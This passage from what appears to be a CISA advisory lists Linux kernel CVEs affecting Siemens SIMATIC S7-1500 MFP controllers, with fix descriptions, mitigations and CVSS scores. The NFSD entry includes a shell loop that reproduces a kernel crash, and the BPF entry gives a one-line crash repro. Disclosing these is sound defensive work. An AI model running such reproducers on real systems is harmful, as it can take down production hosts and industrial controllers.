<p>In the Linux kernel, the following vulnerability has been resolved: NFSD: fix race between nfsd registration and exports_proc As of now nfsd calls create_proc_exports_entry() at start of init_nfsd and cleanup by remove_proc_entry() at last of exit_nfsd. Which causes kernel OOPs if there is race between below 2 operations: (i) exportfs -r (ii) mount -t nfsd none /proc/fs/nfsd for 5.4 kernel ARM64: CPU 1: el1_irq+0xbc/0x180 arch_counter_get_cntvct+0x14/0x18 running_clock+0xc/0x18 preempt_count_add+0x88/0x110 prep_new_page+0xb0/0x220 get_page_from_freelist+0x2d8/0x1778 __alloc_pages_nodemask+0x15c/0xef0 __vmalloc_node_range+0x28c/0x478 __vmalloc_node_flags_caller+0x8c/0xb0 kvmalloc_node+0x88/0xe0 nfsd_init_net+0x6c/0x108 [nfsd] ops_init+0x44/0x170 register_pernet_operations+0x114/0x270 register_pernet_subsys+0x34/0x50 init_nfsd+0xa8/0x718 [nfsd] do_one_initcall+0x54/0x2e0 CPU 2 : Unable to handle kernel NULL pointer dereference at virtual address 0000000000000010 PC is at : exports_net_open+0x50/0x68 [nfsd] Call trace: exports_net_open+0x50/0x68 [nfsd] exports_proc_open+0x2c/0x38 [nfsd] proc_reg_open+0xb8/0x198 do_dentry_open+0x1c4/0x418 vfs_open+0x38/0x48 path_openat+0x28c/0xf18 do_filp_open+0x70/0xe8 do_sys_open+0x154/0x248 Sometimes it crashes at exports_net_open() and sometimes cache_seq_next_rcu(). and same is happening on latest 6.14 kernel as well: [ 0.000000] Linux version 6.14.0-rc5-next-20250304-dirty ... [ 285.455918] Unable to handle kernel paging request at virtual address 00001f4800001f48 ... [ 285.464902] pc : cache_seq_next_rcu+0x78/0xa4 ... [ 285.469695] Call trace: [ 285.470083] cache_seq_next_rcu+0x78/0xa4 (P) [ 285.470488] seq_read+0xe0/0x11c [ 285.470675] proc_reg_read+0x9c/0xf0 [ 285.470874] vfs_read+0xc4/0x2fc [ 285.471057] ksys_read+0x6c/0xf4 [ 285.471231] __arm64_sys_read+0x1c/0x28 [ 285.471428] invoke_syscall+0x44/0x100 [ 285.471633] el0_svc_common.constprop.0+0x40/0xe0 [ 285.471870] do_el0_svc_compat+0x1c/0x34 [ 285.472073] el0_svc_compat+0x2c/0x80 [ 285.472265] el0t_32_sync_handler+0x90/0x140 [ 285.472473] el0t_32_sync+0x19c/0x1a0 [ 285.472887] Code: f9400885 93407c23 937d7c27 11000421 (f86378a3) [ 285.473422] ---[ end trace 0000000000000000 ]--- It reproduced simply with below script: while [ 1 ] do /exportfs -r done &amp; while [ 1 ] do insmod /nfsd.ko mount -t nfsd none /proc/fs/nfsd umount /proc/fs/nfsd rmmod nfsd done &amp; So exporting interfaces to user space shall be done at last and cleanup at first place. With change there is no Kernel OOPs.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-38232">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.1</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-38322</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: perf/x86/intel: Fix crash in icl_update_topdown_event() The perf_fuzzer found a hard-lockup crash on a RaptorLake machine: Oops: general protection fault, maybe for address 0xffff89aeceab400: 0000 CPU: 23 UID: 0 PID: 0 Comm: swapper/23 Tainted: [W]=WARN Hardware name: Dell Inc. Precision 9660/0VJ762 RIP: 0010:native_read_pmc+0x7/0x40 Code: cc e8 8d a9 01 00 48 89 03 5b cd cc cc cc cc 0f 1f ... RSP: 000:fffb03100273de8 EFLAGS: 00010046 .... Call Trace: icl_update_topdown_event+0x165/0x190 ? ktime_get+0x38/0xd0 intel_pmu_read_event+0xf9/0x210 __perf_event_read+0xf9/0x210 CPUs 16-23 are E-core CPUs that don't support the perf metrics feature. The icl_update_topdown_event() should not be invoked on these CPUs. It's a regression of commit: f9bdf1f95339 ("perf/x86/intel: Avoid disable PMU if !cpuc-&gt;enabled in sample read") The bug introduced by that commit is that the is_topdown_event() function is mistakenly used to replace the is_topdown_count() call to check if the topdown functions for the perf metrics feature should be invoked. Fix it.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-38322">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-38591</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: bpf: Reject narrower access to pointer ctx fields The following BPF program, simplified from a syzkaller repro, causes a kernel warning: r0 = *(u8 *)(r1 + 169); exit; With pointer field sk being at offset 168 in __sk_buff. This access is detected as a narrower read in bpf_skb_is_valid_access because it doesn't match offsetof(struct __sk_buff, sk). It is therefore allowed and later proceeds to bpf_convert_ctx_access. Note that for the "is_narrower_load" case in the convert_ctx_accesses(), the insn-&gt;off is aligned, so the cnt may not be 0 because it matches the offsetof(struct __sk_buff, sk) in the bpf_convert_ctx_access. However, the target_size stays 0 and the verifier errors with a kernel warning: verifier bug: error during ctx access conversion(1) This patch fixes that to return a proper "invalid bpf_context access off=X size=Y" error on the load instruction. The same issue affects multiple other fields in context structures that allow narrow access. Some other non-affected fields (for sk_msg, sk_lookup, and sockopt) were also changed to use bpf_ctx_range_ptr for consistency. Note this syzkaller crash was reported in the "Closes" link below, which used to be about a different bug, fixed in commit fce7bd8e385a ("bpf/verifier: Handle BPF_LOAD_ACQ instructions in insn_def_regno()"). Because syzbot somehow confused the two bugs, the new crash and repro didn't get reported to the mailing list.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-38591">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.4</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-38614</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: eventpoll: Fix semi-unbounded recursion Ensure that epoll instances can never form a graph deeper than EP_MAX_NESTS+1 links. Currently, ep_loop_check_proc() ensures that the graph is loop-free and does some recursion depth checks, but those recursion depth checks don't limit the depth of the resulting tree for two reasons: - They don't look upwards in the tree. - If there are multiple downwards paths of different lengths, only one of the paths is actually considered for the depth check since commit 28d82dc1c4ed ("epoll: limit paths"). Essentially, the current recursion depth check in ep_loop_check_proc() just serves to prevent it from recursing too deeply while checking for loops. A more thorough check is done in reverse_path_check() after the new graph edge has already been created; this checks, among other things, that no paths going upwards from any non-epoll file with a length of more than 5 edges exist. However, this check does not apply to non-epoll files. As a result, it is possible to recurse to a depth of at least roughly 500, tested on v6.15. (I am unsure if deeper recursion is possible; and this may have changed with commit 8c44dac8add7 ("eventpoll: Fix priority inversion problem").) To fix it: 1. In ep_loop_check_proc(), note the subtree depth of each visited node, and use subtree depths for the total depth calculation even when a subtree has already been visited. 2. Add ep_get_upwards_depth_proc() for similarly determining the maximum depth of an upwards walk. 3. In ep_loop_check(), use these values to limit the total path length between epoll nodes to EP_MAX_NESTS edges.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-38614">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/674.html">CWE-674 Uncontrolled Recursion</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-38681</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: mm/ptdump: take the memory hotplug lock inside ptdump_walk_pgd() Memory hot remove unmaps and tears down various kernel page table regions as required. The ptdump code can race with concurrent modifications of the kernel page tables. When leaf entries are modified concurrently, the dump code may log stale or inconsistent information for a VA range, but this is otherwise not harmful. But when intermediate levels of kernel page table are freed, the dump code will continue to use memory that has been freed and potentially reallocated for another purpose. In such cases, the ptdump code may dereference bogus addresses, leading to a number of potential problems. To avoid the above mentioned race condition, platforms such as arm64, riscv and s390 take memory hotplug lock, while dumping kernel page table via the sysfs interface /sys/kernel/debug/kernel_page_tables. Similar race condition exists while checking for pages that might have been marked W+X via /sys/kernel/debug/kernel_page_tables/check_wx_pages which in turn calls ptdump_check_wx(). Instead of solving this race condition again, let's just move the memory hotplug lock inside generic ptdump_check_wx() which will benefit both the scenarios. Drop get_online_mems() and put_online_mems() combination from all existing platform ptdump code paths.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-38681">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/366.html">CWE-366 Race Condition within a Thread</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-38704</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: rcu/nocb: Fix possible invalid rdp's-&gt;nocb_cb_kthread pointer access In the preparation stage of CPU online, if the corresponding the rdp's-&gt;nocb_cb_kthread does not exist, will be created, there is a situation where the rdp's rcuop kthreads creation fails, and then de-offload this CPU's rdp, does not assign this CPU's rdp-&gt;nocb_cb_kthread pointer, but this rdp's-&gt;nocb_gp_rdp and rdp's-&gt;rdp_gp-&gt;nocb_gp_kthread is still valid. This will cause the subsequent re-offload operation of this offline CPU, which will pass the conditional check and the kthread_unpark() will access invalid rdp's-&gt;nocb_cb_kthread pointer. This commit therefore use rdp's-&gt;nocb_gp_kthread instead of rdp_gp's-&gt;nocb_gp_kthread for safety check.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-38704">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-38721</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: ctnetlink: fix refcount leak on table dump There is a reference count leak in ctnetlink_dump_table(): if (res &lt; 0) { nf_conntrack_get(&amp;ct-&gt;ct_general); // HERE cb-&gt;args[1] = (unsigned long)ct; ... While its very unlikely, its possible that ct == last. If this happens, then the refcount of ct was already incremented. This 2nd increment is never undone. This prevents the conntrack object from being released, which in turn keeps prevents cnet-&gt;count from dropping back to 0. This will then block the netns dismantle (or conntrack rmmod) as nf_conntrack_cleanup_net_list() will wait forever. This can be reproduced by running conntrack_resize.sh selftest in a loop. It takes ~20 minutes for me on a preemptible kernel on average before I see a runaway kworker spinning in nf_conntrack_cleanup_net_list. One fix would to change this to: if (res &lt; 0) { if (ct != last) nf_conntrack_get(&amp;ct-&gt;ct_general); But this reference counting isn't needed in the first place. We can just store a cookie value instead. A followup patch will do the same for ctnetlink_exp_dump_table, it looks to me as if this has the same problem and like ctnetlink_dump_table, we only need a 'skip hint', not the actual object so we can apply the same cookie strategy there as well.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-38721">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/772.html">CWE-772 Missing Release of Resource after Effective Lifetime</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-38725</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: usb: asix_devices: add phy_mask for ax88772 mdio bus Without setting phy_mask for ax88772 mdio bus, current driver may create at most 32 mdio phy devices with phy address range from 0x00 ~ 0x1f. DLink DUB-E100 H/W Ver B1 is such a device. However, only one main phy device will bind to net phy driver. This is creating issue during system suspend/resume since phy_polling_mode() in phy_state_machine() will directly deference member of phydev-&gt;drv for non-main phy devices. Then NULL pointer dereference issue will occur. Due to only external phy or internal phy is necessary, add phy_mask for ax88772 mdio bus to workarnoud the issue.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-38725">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-38727</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netlink: avoid infinite retry looping in netlink_unicast() netlink_attachskb() checks for the socket's read memory allocation constraints. Firstly, it has: rmem &lt; READ_ONCE(sk-&gt;sk_rcvbuf) to check if the just increased rmem value fits into the socket's receive buffer. If not, it proceeds and tries to wait for the memory under: rmem + skb-&gt;truesize &gt; READ_ONCE(sk-&gt;sk_rcvbuf) The checks don't cover the case when skb-&gt;truesize + sk-&gt;sk_rmem_alloc is equal to sk-&gt;sk_rcvbuf. Thus the function neither successfully accepts these conditions, nor manages to reschedule the task - and is called in retry loop for indefinite time which is caught as: rcu: INFO: rcu_sched self-detected stall on CPU rcu: 0-....: (25999 ticks this GP) idle=ef2/1/0x4000000000000000 softirq=262269/262269 fqs=6212 (t=26000 jiffies g=230833 q=259957) NMI backtrace for cpu 0 CPU: 0 PID: 22 Comm: kauditd Not tainted 5.10.240 #68 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-4.fc42 04/01/2014 Call Trace: dump_stack lib/dump_stack.c:120 nmi_cpu_backtrace.cold lib/nmi_backtrace.c:105 nmi_trigger_cpumask_backtrace lib/nmi_backtrace.c:62 rcu_dump_cpu_stacks kernel/rcu/tree_stall.h:335 rcu_sched_clock_irq.cold kernel/rcu/tree.c:2590 update_process_times kernel/time/timer.c:1953 tick_sched_handle kernel/time/tick-sched.c:227 tick_sched_timer kernel/time/tick-sched.c:1399 __hrtimer_run_queues kernel/time/hrtimer.c:1652 hrtimer_interrupt kernel/time/hrtimer.c:1717 